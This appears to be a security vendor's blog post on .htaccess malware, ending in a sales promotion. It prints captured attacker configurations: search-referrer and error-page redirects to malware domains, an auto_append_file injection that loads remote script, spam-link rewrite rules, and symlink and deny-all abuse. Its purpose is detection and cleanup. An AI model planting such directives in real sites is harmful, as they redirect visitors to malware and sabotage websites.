The .htaccess file is notorious for being targeted by attackers. Whether it’s using the file to hide malware, redirect search engines to other sites with blackhat SEO tactics, hide backdoors, inject content, modify php.ini values; the possibilities are endless.
Many site owners are unaware of this file, due to it starting with a “.” making it a hidden file. .htaccess malware can be hard to pinpoint and clean on a server since it allows you to make multiple changes to the web server and its behavior.
What is a .htaccess file?
The .htaccess file is a very crucial and powerful file specific to apache server environments. It allows web administrators to make changes to the environment as a whole, or, on a per-directory basis. It can allow or deny access to certain IP addresses, referrers, and user agents.
It is also used to enable things like “pretty permalinks” in WordPress environments with the use of mod_rewrite. It is a very versatile, useful and powerful file, and that’s precisely why attackers will misuse this file for their own goals.
.htaccess Redirect Malware
One of the more common attacks we’ve encountered is .htaccess redirects. This redirects users from search engines to malware utilizing the following instruction set :
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
..
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ hxxp://villusoftreit[.]ru/in.cgi?3 [R=301,L]
This script checks the referrer for anyone visiting the site from the search engines listed, and then proceeds to redirect the user to a page with malware. (I.E. hxxp://villusoftreit[.]ru/in.cgi?3) Website owners are more likely to visit their website by entering the domain directly into their address bar, rather than through a search engine. This makes it less likely that the website owner will notice the infection until they are told about it by someone.
Here’s another example of an .htaccess redirect, except prior to post there were hundreds of white spaces before the “RewriteCond,” which makes it harder to find in a text editor:
# BEGIN WordPress
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* hxxp://globalpoweringgatheringon[.]com/in.php?n=30 [R,L]
Another common type of attack involving the .htaccess file is redirecting error pages to malware, which can be even harder to detect. This is because most of the website functions normally. The redirect will only trigger on non-existent pages. Here’s an example of what you’d find involving this type of attack:
RewriteEngine On
ErrorDocument 400 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 401 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 403 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 404 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 500 hxxp://powercrystal[.]ru/inject/index.php
Another example:
ErrorDocument 400 hxxp://arthurlundt.cz[.]cc/ht_er_docs/
ErrorDocument 403 hxxp://arthurlundt.cz[.]cc/ht_er_docs/
[…truncated…]
ErrorDocument 404 hxxp://nicomagen.cz[.]cc/ht_er_docs/
ErrorDocument 405 hxxp://nicomagen.cz[.]cc/ht_er_docs/
(mis)use of auto_append_file
We’ve also noticed attackers appending malware to the site by modifying the PHP value “auto_append_file” to load malware from a hidden location, instead of redirecting through a .htaccess file. For example:
php_value auto_append_file “/tmp/13063671977873.php”
The content of “/tmp/13063671977873.php” is appended to every PHP file, which will look something like this:
<script src=”hxxp://nicomagen.cz[.]cc/jquery.js”></script>
This is a common javascript malware that we see in many different types of infections ranging from malicious redirects, to credit card swipers. Periodically, the attackers will swap the malicious domains in use in order to avoid detection. This is usually done on a per-site basis using a block list.
.htaccess used to generate spam links
Another way we have seen the .htaccess file abused is through spam link generation:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
This malware uses a regular expression that – when coupled with spam malware within the file structure – can generate hundreds of spam links on the website. This will then show up in Google and other search engine search results and harm the website’s SEO.
.htaccess used with symlink bombs
A very common attack with WHM/cPanel environments is the misuse of symlinks. If symlink protection is disabled within WHM the attackers can use symlinks to move laterally throughout the environment and infect other websites or just create a flood of random spammy symlinks spread across the file structure.
This is made possible in part with the use of an .htaccess file placed in the directory in question:
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
This will instruct the server to follow symlinks to their destination and aid the attackers in spreading their malware throughout the environment.
Nuisance Malware
Another attack that we have seen a lot of recently is the abuse of .htaccess files to deny access to website files. For example, we have seen the attackers litter hundreds, or sometimes thousands of .htaccess files throughout the website file structure with the following:
<FilesMatch ‘.(php|php5|phtml)$’>
Order allow,deny
Deny from all
</FilesMatch>
This is a very simple .htaccess file which does nothing other than prevent php execution.
This file can function as a hardening measure when placed in a directory such as ./wp-content/uploads. However, when littered throughout the entire file structure, it can disrupt the functionality of the website and render the wp-admin panel useless. It does this by blocking the website administrator from performing maintenance, updates, or taking down the entire website.
Detection and Response
Our free scanner is able to detect many of these .htaccess attacks on your site. If you’ve been hacked, reach out to our team for remediation services.
Exclusively for November, 2021 we’re offering 15% off all Website Security Platform plans as part of our black friday holiday shopping preparation for website owners. Use promo code “blackfriday21” at checkout for your discount.
Not sure about getting complete website security right now? Try our Website Firewall free for 30-days, and see the results for yourself.